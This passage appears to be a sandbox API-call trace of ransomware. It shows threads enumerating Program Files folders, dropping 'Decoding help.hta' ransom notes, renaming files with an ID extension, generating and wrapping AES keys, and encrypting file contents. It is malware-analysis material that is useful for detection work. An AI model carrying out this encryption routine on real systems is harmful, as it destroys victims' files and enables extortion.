lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.876] FindNextFileW (in: hFindFile=0x10fbc898, lpFindFileData=0x2374fd30 | out: lpFindFileData=0x2374fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.876] FindClose (in: hFindFile=0x10fbc898 | out: hFindFile=0x10fbc898) returned 1 Thread: id = 805 os_tid = 0xac4 [0054.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*", lpFindFileData=0x2384fd30 | out: lpFindFileData=0x2384fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b4e8 [0061.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.341] FindNextFileW (in: hFindFile=0x10a4b4e8, lpFindFileData=0x2384fd30 | out: lpFindFileData=0x2384fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.341] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.341] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.341] FindNextFileW (in: hFindFile=0x10a4b4e8, lpFindFileData=0x2384fd30 | out: lpFindFileData=0x2384fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x53b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.341] lstrcpyW (in: lpString1=0x3402328, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*" [0061.341] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*") returned 71 [0061.341] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\Decoding help.hta" [0061.341] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\decoding help.hta")) returned 0xffffffff [0061.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.681] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2384fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2384fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.682] CloseHandle (hObject=0xe6c) returned 1 [0061.682] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 806 os_tid = 0x414 [0054.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*", lpFindFileData=0x2394fd30 | out: lpFindFileData=0x2394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da5f8 [0056.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.835] FindNextFileW (in: hFindFile=0x5da5f8, lpFindFileData=0x2394fd30 | out: lpFindFileData=0x2394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.835] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.836] FindNextFileW (in: hFindFile=0x5da5f8, lpFindFileData=0x2394fd30 | out: lpFindFileData=0x2394fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.836] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*" [0056.836] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*") returned 63 [0056.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Decoding help.hta" [0056.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\decoding help.hta")) returned 0xffffffff [0056.836] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaa0 [0058.302] WriteFile (in: hFile=0xaa0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2394fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.303] CloseHandle (hObject=0xaa0) returned 1 [0058.303] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.303] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.305] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.305] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*" [0058.305] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*.*") returned 63 [0058.305] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" [0058.305] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" [0058.305] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaa0 [0058.306] CreateFileMappingA (hFile=0xaa0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xaa4 [0058.306] CryptAcquireContextA (in: phProv=0x2394fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2394fcec*=0x2aac5098) returned 1 [0060.195] CryptGenKey (in: hProv=0x2aac5098, Algid=0x6610, dwFlags=0x1, phKey=0x2394fce8 | out: phKey=0x2394fce8*=0x42cf798) returned 1 [0060.195] CryptExportKey (in: hKey=0x42cf798, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2394fbe4, pdwDataLen=0x2394fce4 | out: pbData=0x2394fbe4*, pdwDataLen=0x2394fce4*=0x2c) returned 1 [0060.195] MapViewOfFile (hFileMappingObject=0xaa4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4940000 [0063.795] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2394fbe4*, pdwDataLen=0x2394fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2394fbe4*, pdwDataLen=0x2394fcf8*=0x100) returned 1 [0063.795] CryptEncrypt (in: hKey=0x42cf798, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4940000*, pdwDataLen=0x2394fce4*=0x140, dwBufLen=0x140 | out: pbData=0x4940000*, pdwDataLen=0x2394fce4*=0x140) returned 1 [0063.796] UnmapViewOfFile (lpBaseAddress=0x4940000) Thread: id = 807 os_tid = 0x7e8 [0054.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x23a4fd30 | out: lpFindFileData=0x23a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.038] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x23a4fd30 | out: lpFindFileData=0x23a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.038] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.038] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.038] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x23a4fd30 | out: lpFindFileData=0x23a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.038] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 808 os_tid = 0xac8 [0054.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*", lpFindFileData=0x23b8fd30 | out: lpFindFileData=0x23b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b528 [0061.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.342] FindNextFileW (in: hFindFile=0x10a4b528, lpFindFileData=0x23b8fd30 | out: lpFindFileData=0x23b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.342] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.342] FindNextFileW (in: hFindFile=0x10a4b528, lpFindFileData=0x23b8fd30 | out: lpFindFileData=0x23b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x59f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.342] lstrcpyW (in: lpString1=0x2aa10db8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*" [0061.342] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*") returned 68 [0061.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\Decoding help.hta" [0061.342] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\decoding help.hta")) returned 0xffffffff [0061.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.682] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x23b8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x23b8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.683] CloseHandle (hObject=0xe6c) returned 1 [0061.683] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 809 os_tid = 0x79c [0054.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*", lpFindFileData=0x23e0fd30 | out: lpFindFileData=0x23e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0056.846] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.846] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x23e0fd30 | out: lpFindFileData=0x23e0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.846] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.846] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.846] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x23e0fd30 | out: lpFindFileData=0x23e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.846] lstrcpyW (in: lpString1=0x9a930d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*" [0056.846] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*") returned 63 [0056.846] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Decoding help.hta" [0056.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\decoding help.hta")) returned 0xffffffff [0056.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb18 [0058.333] WriteFile (in: hFile=0xb18, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x23e0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x23e0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.334] CloseHandle (hObject=0xb18) returned 1 [0058.334] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.334] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.334] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.334] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*" [0058.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*.*") returned 63 [0058.334] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" [0058.334] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" [0058.334] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common 